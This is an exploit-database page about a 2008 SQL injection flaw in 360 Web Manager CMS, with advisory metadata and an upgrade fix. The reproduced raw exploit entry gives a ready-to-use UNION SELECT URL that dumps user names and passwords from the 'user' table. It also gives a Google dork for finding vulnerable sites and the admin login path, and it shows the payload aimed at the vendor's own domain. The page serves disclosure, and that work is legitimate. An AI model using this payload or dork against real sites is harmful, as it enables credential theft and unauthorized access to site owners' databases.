header-logo
Suggest Exploit
vendor:
360 Web Manager CMS
by:
Ded MustD!e
9
CVSS
HIGH
SQL Injection
89
CWE
Product Name: 360 Web Manager CMS
Affected Version From: Prior to 1.0.1
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: a:360webmanager:360_web_manager_cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

360 Web Manager CMS Remote SQL Injection Vulnerability

360 Web Manager CMS is prone to a remote SQL injection vulnerability. An attacker can exploit this issue to gain access to the application database, potentially resulting in the compromise of sensitive data. The issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. An attacker can exploit this issue to inject or manipulate SQL queries in the back-end database, allowing for the manipulation or disclosure of arbitrary data. This issue affects versions prior to 360 Web Manager CMS 1.0.1.

Mitigation:

Upgrade to version 1.0.1 or later.
Source

Exploit-DB raw data:

360 Web Manager CMS Remote SQL Injection Vulnerability

Author: Ded MustD!e

Site: http://www.360webmanager.com/

Google Dork: inurl:"IDFM=" "form.php"

Exploit: http://site.com/form.php?IDM=7&IDSM=20&IDFM=-1+union+select+1,concat_ws(0x3a,name,password),3,4
,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+user/*

Example: http://www.360webmanager.com/form.php?IDM=2&IDSM=24&IDFM=-1+union+select+1,concat_ws(0x3a,name,password),3,4
,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+user/*  =)))

Details: number of columns may be >20, admin panel - http://www.site.com/adm/login.php

# milw0rm.com [2008-01-20]

Navigation

Suggest Exploit

Services By CQR